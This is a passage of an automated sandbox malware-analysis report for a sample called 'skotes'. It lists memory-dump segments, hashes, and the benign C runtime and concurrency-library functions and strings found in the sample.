                                                                                                                • Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Concurrency::details::$Proxy::Scheduler$ExecutionHardware$AffinityAffinity::BorrowedCoreCountCurrentFixedIncrementListResourceResource::StateToggle
                                                                                                                • String ID: =L-t
                                                                                                                • API String ID: 932774601-768041998
                                                                                                                • Opcode ID: 0595b87a9fd9c779ca9a6a826b9c6f4e9dd51fa1cfc4155457ee4ea2dff10dce
                                                                                                                • Instruction ID: 031fcaf14c0c7bd9284c7ab34199785582a440e1dc14b497d2fc0a0298b79120
                                                                                                                • Opcode Fuzzy Hash: 0595b87a9fd9c779ca9a6a826b9c6f4e9dd51fa1cfc4155457ee4ea2dff10dce
                                                                                                                • Instruction Fuzzy Hash: 1C21BD31900614EFCB24EF65D8908ABF3F9FF897007004A5EE442A7651EB38F905CBA2
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: _wcsrchr
                                                                                                                • String ID: .bat$.cmd$.com$.exe
                                                                                                                • API String ID: 1752292252-4019086052
                                                                                                                • Opcode ID: a71335734e1e795e863cd4126cc5a286f7f4bc39eb6daf4c3fd8d02eccd51576
                                                                                                                • Instruction ID: 1c6b9cba3318462d8c91e7c4c142fba8e6f8e706619bfecb19edf701267445a8
                                                                                                                • Opcode Fuzzy Hash: a71335734e1e795e863cd4126cc5a286f7f4bc39eb6daf4c3fd8d02eccd51576
                                                                                                                • Instruction Fuzzy Hash: DF01262770866235661C50589D06BF617E88BD2BB4B25002BFC54F76C2EF8DDD43A1A0
                                                                                                                APIs
                                                                                                                • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0079FB06
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error
                                                                                                                • String ID: GetCurrentProcessorNumberEx$GetThreadGroupAffinity$SetThreadGroupAffinity$kernel32.dll
                                                                                                                • API String ID: 348560076-465693683
                                                                                                                • Opcode ID: 4c4b1a46b90ed9d29fcbfc88f57ba58f61723eecaee91e020730db3d51e90e9b
                                                                                                                • Instruction ID: cedabd15144b95d00403177c76fdb172bd96ab004b78f19060dd346b59a07f99
                                                                                                                • Opcode Fuzzy Hash: 4c4b1a46b90ed9d29fcbfc88f57ba58f61723eecaee91e020730db3d51e90e9b
                                                                                                                • Instruction Fuzzy Hash: C00168A5751305BEA7187774AC8FEAB2AECCD46314730493BF440E7252EDADD80042A4
                                                                                                                APIs
                                                                                                                • StructuredWorkStealingQueue.LIBCMT ref: 007B20B7
                                                                                                                  • Part of subcall function 007ACAF3: Mailbox.LIBCMT ref: 007ACB2D
                                                                                                                • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 007B20C8
                                                                                                                • StructuredWorkStealingQueue.LIBCMT ref: 007B20FE
                                                                                                                • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 007B210F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Work$Concurrency::details::ItemItem::QueueStealingStructured$Mailbox
                                                                                                                • String ID: e
                                                                                                                • API String ID: 1411586358-4024072794
                                                                                                                • Opcode ID: 1b6716c63c17d6c6149872910042524b7f9ebb3f5e3c7538eb01a51a2faaeb53
                                                                                                                • Instruction ID: 3af69f29a8680314772264f7bb0171cb5d4e9b4d86c0bb6a6bab60fab8c71920
                                                                                                                • Opcode Fuzzy Hash: 1b6716c63c17d6c6149872910042524b7f9ebb3f5e3c7538eb01a51a2faaeb53
                                                                                                                • Instruction Fuzzy Hash: 6C118231502109EBDB15DE6DC8857EB73A4EF02364B24815ABC069F103DA79D902CBA0
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                • api-ms-win-core-synch-l1-2-0.dll, xrefs: 0079D03B
                                                                                                                • WakeAllConditionVariable, xrefs: 0079D069
                                                                                                                • kernel32.dll, xrefs: 0079D04C
                                                                                                                • SleepConditionVariableCS, xrefs: 0079D05D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ___scrt_fastfail
                                                                                                                • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                                • API String ID: 2964418898-3242537097
                                                                                                                • Opcode ID: edac67b234da4db81de88dc73382602d3b4d4d883a45d3918a058520cdbc4706
                                                                                                                • Instruction ID: 291f9d9c6654cd0b31f341f44a6db1a943805084f9e4daf7205fa56b77eb90ee
                                                                                                                • Opcode Fuzzy Hash: edac67b234da4db81de88dc73382602d3b4d4d883a45d3918a058520cdbc4706
                                                                                                                • Instruction Fuzzy Hash: 1C0126A0783B22A9EE383B797C0DE5B12DC8F86B44F541121E940F7280DEEDCC114565
                                                                                                                APIs
                                                                                                                • Concurrency::location::_Assign.LIBCMT ref: 007AE91E
                                                                                                                • Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 007AE926
                                                                                                                • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 007AE950
                                                                                                                • Concurrency::details::ScheduleGroupSegmentBase::ReleaseInternalContext.LIBCMT ref: 007AE959
                                                                                                                • Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 007AE9DC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
